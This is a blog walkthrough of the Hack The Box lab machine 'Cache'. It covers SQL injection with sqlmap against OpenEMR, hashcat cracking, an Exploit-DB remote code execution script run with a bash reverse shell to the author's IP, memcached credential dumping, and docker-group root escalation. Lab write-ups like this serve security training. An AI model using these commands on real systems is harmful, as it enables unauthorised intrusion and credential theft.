[hackthebox]Cache

cache1

Introduction

This is an interesting machine, it is rated as medium difficulty, there are a few techniques such as sql injection, memcache enumeration and docker privilege escalation. I have learned memcache and docker privesc from this machine and deepened my familiarity with sqlmap, sqlmap in my opinion is the most difficult technique as there are a lot of syntax to use for test luckily I got sqlmap else enumeration with sql injection is a pain in the neck and consumed more time than usual.

After I have got the root of this machine I realize Linux is as secured as the administrator who configures it, misconfiguration leads to privilege escalation in a command away.

Enumeration

This section takes up the most time.

nmap

Ignore those filtered ports, I only need to enumerate web service (http, tcp/80), usually htb machine will not be doing ssh bruteforcing so do not waste time on ssh.

# Nmap 7.80 scan initiated Mon May 11 09:11:53 2020 as: nmap -sV -sC -T4 -p- -oN cache -vvv 10.10.10.188
Warning: 10.10.10.188 giving up on port because retransmission cap hit (6).
Nmap scan report for cache.htb (10.10.10.188)
Host is up, received syn-ack (0.18s latency).
Scanned at 2020-05-11 09:11:53 +08 for 1052s
Not shown: 65511 closed ports
Reason: 65511 conn-refused
PORT      STATE    SERVICE        REASON      VERSION
22/tcp    open     ssh            syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCb3lyySrN6q6RWe0mdRQOvx8TgDiFAVhicR1h3UlBANr7ElILe7ex89jpzZSkhrYgCF7iArq7PFSX+VY52jRupsYJp7V2XLY9TZOq6F7u6eqsRA60UVeqkh+WnTE1D1GtQSDM2693/1AAFcEMhcwp/Z7nscp+PY1npxEEP6HoCHnf4h4p8RccQuk4AdUDWZo7WlT4fpW1oJCDbt+AOU5ylGUW56n4uSUG8YQVP5WqSspr6IY/GssEw3pGvRLnoJfHjARoT93Fr0u+eSs8zWhpHRWkTEWGhWIt9pPI/pAx2eAeeS0L5knZrHppoOjhR/Io+m0i1kF1MthV+qYjDjscf
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFAHWTqc7a2Az0RjFRBeGhfQkpQrBmEcMntikVFn2frnNPZklPdV7RCy2VW7Ae+LnyJU4Nq2LYqp2zfps+BZ3H4=
|   256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMnbsx7/pCTUKU7WwHrL/d0YS9c99tRraIPvg5zrRpiF
80/tcp    open     http           syn-ack     Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Cache
324/tcp   filtered rpki-rtr-tls   no-response
2315/tcp  filtered precise-sft    no-response
2551/tcp  filtered isg-uda-server no-response
4562/tcp  filtered unknown        no-response
11282/tcp filtered unknown        no-response
12223/tcp filtered unknown        no-response
13789/tcp filtered unknown        no-response
17510/tcp filtered unknown        no-response
20397/tcp filtered unknown        no-response
24176/tcp filtered unknown        no-response
26656/tcp filtered unknown        no-response
30010/tcp filtered unknown        no-response
32108/tcp filtered unknown        no-response
32745/tcp filtered unknown        no-response
39491/tcp filtered unknown        no-response
41398/tcp filtered unknown        no-response
42644/tcp filtered unknown        no-response
46666/tcp filtered unknown        no-response
49454/tcp filtered unknown        no-response
58016/tcp filtered unknown        no-response
62314/tcp filtered unknown        no-response
63905/tcp filtered unknown        no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 11 09:29:25 2020 -- 1 IP address (1 host up) scanned in 1052.35 seconds

Web enumeration

By opening the browser with http://10.10.10.188 the page looks like this

Contact Us

This page seems to be dynamic, but it has no functionality. I can submit whatever I want but nothing will happen, checking the source code the submit button leads to nowhere.
cache3

From the source code the entire form leads to nowhere and hence is a rabbit hole.
cache4

Author

The author page gives the first clue about the web.
The page says this:
Check out his other projects like Cache:


HMS(Hospital Management System)
cache5

Login

This login page is dynamic, and looking from the source code there is a javascript source link.
"jquery/functionality.js"
cache6

Check out the functionality.js

The javascript has hardcoded credentials for the login page.
cache7

There is nothing after login

cache8
At first impression I thought this might be a steganographic puzzle, but it is a rabbit hole.

Get the Hospital Management System

On the first clue, it says there is a HMS like Cache, so by an educated guess I insert 10.10.10.188 hms.htb into /etc/hosts file.
cache10

I spent a lot of time doing directories and files enumeration with dirbuster, nikto and burpsuite. I found a lot of directories and all can do listing:

/images (Status: 301)
/modules (Status: 301)
/common (Status: 301)
/library (Status: 301)
/public (Status: 301)
/portal (Status: 301)
/tests (Status: 301)
/sites (Status: 301)
/services (Status: 301)
/custom (Status: 301)
/javascript (Status: 301)
/contrib (Status: 301)
/templates (Status: 301)
/interface (Status: 301)
/vendor (Status: 301)
/config (Status: 301)
/Documentation (Status: 301)
/sql (Status: 301)
/ci (Status: 301)
/LICENSE (Status: 200)
/cloud (Status: 301)
/ccr (Status: 301)
/patients (Status: 301)
/repositories (Status: 301)
/myportal (Status: 301)
/entities (Status: 301)
/controllers (Status: 301)
/server-status (Status: 403)

From nikto I have these:

cyruslab@kali:~/htb/cache$ nikto -host hms.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.188
+ Target Hostname: hms.htb
+ Target Port: 80
+ Start Time: 2020-05-11 12:02:24 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: interface/login/login.php?site=default
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-3268: /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /library/: Directory indexing found.
+ OSVDB-3092: /library/: This might be interesting...
+ OSVDB-3268: /public/: Directory indexing found.
+ OSVDB-3092: /public/: This might be interesting...
+ OSVDB-3268: /services/: Directory indexing found.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3268: /tests/: Directory indexing found.
+ OSVDB-3092: /tests/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /ci/: Directory indexing found.
+ OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
+ Cookie OpenEMR created without the httponly flag
+ OSVDB-3268: /sites/: Directory indexing found.
+ Cookie PHPSESSID created without the httponly flag
+ /composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ 7785 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time: 2020-05-11 12:31:04 (GMT8) (1720 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Open-EMR exploit

After searching the web I found this https://www.exploit-db.com/exploits/45161, the code has a comment which has a youtube video to demonstrate how to use sqlmap to do sql injection and use the exploit for openemr.

The same exploit can be found with searchsploit openemr
cache9

Sql injection with sqlmap

The video serves as a very good guide, but there is a document which documents the all the sqli vulnerabilities of openemr, thanks to reddit user thenewbier for directing me to the document.

The below is the portal login page, to show the sql error, the portal page is always turned off but in fact after reset the portal will re-appear again which means the intended way should be to enable the portal. If the portal remains disable the injection with sqlmap will fail.
cache11

Machine resets go back to the original state.
cache12

  1. Click on register
  2. change the uri to /portal/add_edit_event_user.php?eid=1′

cache13
Then from register page change the uri /portal/add_edit_event_user.php?eid=1'
cache14
The proof of concept injection to review OS version is this:
cache15

Use burpsuite to capture the request and save to file

cache16

Save the request into a request file and remove the %27 and use sqlmap.
cache17

Use sqlmap

sqlmap -r emr.req --dbs --dbms=MySQL

cache19
the database is openemr.
Then enumerate the tables.
sqlmap -r emr.req -D openemr --tables
cache20

Get the dump of table users_secure
sqlmap -r emr.req -D openemr -T users_secure --dump
The username and password hash are enumerated.
cache21

Crack the openemr_admin password

the password hash has a salt which starts with $2a$, from this reference: https://hashcat.net/wiki/doku.php?id=example_hashes I need to use module number 3200 which is blowfish / bcrypt.

hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt where hash is the password hash file.
cache22

The username is openemr_admin and password is xxxxxx

Get the user flag

Referring to the remote code execution python code https://www.exploit-db.com/exploits/45161, this code has to be run by python2 and requires requests module, if you are using kali linux 2020 and does not have the requests library and need to download with the pip2 you need to add these two lines to your /etc/apt/sources.list

deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Then do apt update then apt install python-pip, after that do pip install requests.
Start the nc -lvnp 133.

python openemr_rce.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.21/1337 0>&1'

Upon success I will get a shell.
cache23

Upgrade to interactive shell in order to switch user in interactive mode, read this guide: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

The username ash and password H@v3_fun found in http://10.10.10.188/jquery/functionality.js can be used here to switch user to ash.

To upgrade to interactive shell:

  1. python3 -c "import pty;pty.spawn('/bin/bash')"
  2. Press Ctrl-Z on your keyboard so that your current nc session moves to the background.
  3. Type stty raw -echo
  4. Type fg, which will bring back the shell in a weird fashion
  5. Type reset, will restore your weird shell into normal
  6. Then choose xterm-256color as terminal
  7. Make adjustment to the shell stty rows 35 and stty cols 190, this way when checking for netstat and ps you will be able to see all the output untruncated.

su ash to switch to ash
cache24

Get the root flag

ash is not a sudoer, neither does this account have any suid enabled files, the way is to change user to luffy which is a member of docker group.
cache25
cache26

There is a service in netstat which normally a htb machine does not use.
cache27
ash does not have privilege to logon as mysql hence it is not possible to do any mysqldump, besides the database might not even have other passwords except for openemr.

The only suspicious port is tcp/11211 which after researched I found this site: https://www.hackingarticles.in/penetration-testing-on-memcached-server/

telnet 127.0.0.1 11211
within the memcache server there is one slab active. stats slabs.

Enumerate the items stats items
The slab id are all 1.
cache29

Then dump all contents of slab id 1 stats cachedump 1 0
cache30
I get everything but since I have already got the root, the useful things are get user and get passwd
cache31

luffy password is 0n3_p1ec3.

I can either ssh or switch user to luffy.
cache32

For docker privilege escalation read this https://fosterelli.co/privilege-escalation-via-docker.
In Cache there is a downloaded docker image docker image ls
cache33

docker run -v /:/mnt/cache -ti ubuntu chroot /mnt/cache bash to launch the root shell.
or docker run -v /:/mnt/cache -ti ubuntu, you will get a shell within docker ubuntu, then go to /mnt/cache/root/ to read the root.txt
cache34

Another method.
cache35

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s